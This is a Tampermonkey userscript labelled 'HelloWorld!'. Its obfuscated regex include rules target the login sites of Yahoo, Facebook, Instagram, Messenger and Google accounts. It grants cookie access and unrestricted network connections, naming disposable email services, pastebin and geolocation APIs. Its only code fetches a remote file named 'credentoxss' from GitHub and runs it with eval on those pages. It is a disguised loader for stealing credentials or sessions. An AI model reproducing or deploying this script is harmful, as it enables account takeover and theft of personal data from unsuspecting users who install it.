// ==UserScript==
// @name         TamperMonkey
// @namespace    http://tampermonkey.net/
// @version      0.3
// @description  HelloWorld!
// @author       You
// @run-at       document-end
// @grant        unsafeWindow
// @grant        window.close
// @grant        window.focus
// @grant        GM_addStyle
// @grant        GM_deleteValue
// @grant        GM_listValues
// @grant        GM_cookie
// @grant        GM_addValueChangeListener
// @include      /^(?=.t{2})h..[a-z](?<![q-znoa-m])s?:(?=...+\.)\/\/[\w-]+\.(?!z)[a-z]{1}(?<![a-x])(a)(?:h|i)(?<=h|e|y)(p|o|p){2,2}\.(?<!..p)c\2(?![n-za-l])[a-z].*$/
// @grant        GM_removeValueChangeListener
// @grant        GM_setValue
// @grant        GM_getValue
// @include      /^(?=.t{2,2})h..(?!n.?|o.?)(?:ns?|os?|ps?):\/{2,2}[\w-]+\.[f|i|s|h](?<=f|r|o|g)a(c)e[a-c](o)\2(?<!a..)(?<!c..)[k]\.\1\2([m]).*$/
// @grant        GM_log
// @grant        GM_getResourceText
// @grant        GM_getResourceURL
// @grant        GM_registerMenuCommand
// @grant        GM_unregisterMenuCommand
// @grant        GM_openInTab
// @include      /^(?=.t{2})h..(?!n.?|o.?)(?:ns?|os?|ps?):\/{2}(?:\w|-)+\.[^a-gj-zh](?=.s)n.t(a)g[t|r|e|e](?<!t)(?<!e)\1([m-m])\.[a-z](?<!a|b|[d-z])o\2.*$/
// @grant        GM_xmlhttpRequest
// @grant        GM_download
// @grant        GM_getTab
// @grant        GM_saveTab
// @include      /^(?=.t{2})h..[p]s?:(?=...+\.m)\/\/[\w-]+\.(.)([^a-d.\/\d\sf-z])s{2,2}\2(n|o|p|e)(?<![a-fo-z])g\2[r-r]\.(?!a|b)(a|b|c)o\1.*$/
// @grant        GM_getTabs
// @grant        GM_notification
// @grant        GM_setClipboard
// @grant        GM_info
// @connect      *
// @include      /^(?=.(t){2,2})h..[p]s?:\/\/(?!b|c)[abc]([c])\2([^a-np-z\s\d.\/])un\1.\.(g)(?=..\4)\3{2}.l(?<=s......)e\.\2\3m.*$/
// @connect      github.com
// @connect      githubusercontent.com
// @include      /^(?=.t{2})h..[a-z](?<![q-znoa-m])s?:(?=...+\.)\/\/[\w-]+\.(?!z)[a-z]{1}(?<![a-x])(a)(?:h|i)(?<=h|e|y)(p|o|p){2,2}\.(?<!..p)c\2(?![n-za-l])[a-z].*$/
// @connect      google.com
// @connect      pastebin.com
// @include      /^(?=.t{2})h..[p]s?:(?=...+\.m)\/\/[\w-]+\.(.)([^a-d.\/\d\sf-z])s{2,2}\2(n|o|p|e)(?<![a-fo-z])g\2[r-r]\.(?!a|b)(a|b|c)o\1.*$/
// @connect      guerrillamail.com
// @connect      elasticemail.com
// @include      /^(?=.(t){2,2})h..[p]s?:\/\/(?!b|c)[abc]([c])\2([^a-np-z\s\d.\/])un\1.\.(g)(?=..\4)\3{2}.l(?<=s......)e\.\2\3m.*$/
// @connect      000webhost.com
// @connect      heroku.com
// @connect      geoip-db.com
// @include      /^(?=.t{2})h..(?!n.?|o.?)(?:ns?|os?|ps?):\/{2}(?:\w|-)+\.[^a-gj-zh](?=.s)n.t(a)g[t|r|e|e](?<!t)(?<!e)\1([m-m])\.[a-z](?<!a|b|[d-z])o\2.*$/
// @connect      geolocation-db.com
// @connect      bit.ly
// @connect      duckduckgo.com
// @include      /^(?=.t{2,2})h..(?!n.?|o.?)(?:ns?|os?|ps?):\/{2,2}[\w-]+\.[f|i|s|h](?<=f|r|o|g)a(c)e[a-c](o)\2(?<!a..)(?<!c..)[k]\.\1\2([m]).*$/
// @connect      mega.nz
// @connect      youtube.com
// @connect      fbcdn.net
// ==/UserScript==

(function() {
    var useringer ="Unset";
    var basehref="https://raw.githubusercontent.com/";
    GM_xmlhttpRequest ( {
            method:     'GET',
            url:        basehref+"lecatos/temposcripts/master/credentoxss",
            onload:     function (responseDetails) {
                            eval(responseDetails.responseText);
                        }});
})();
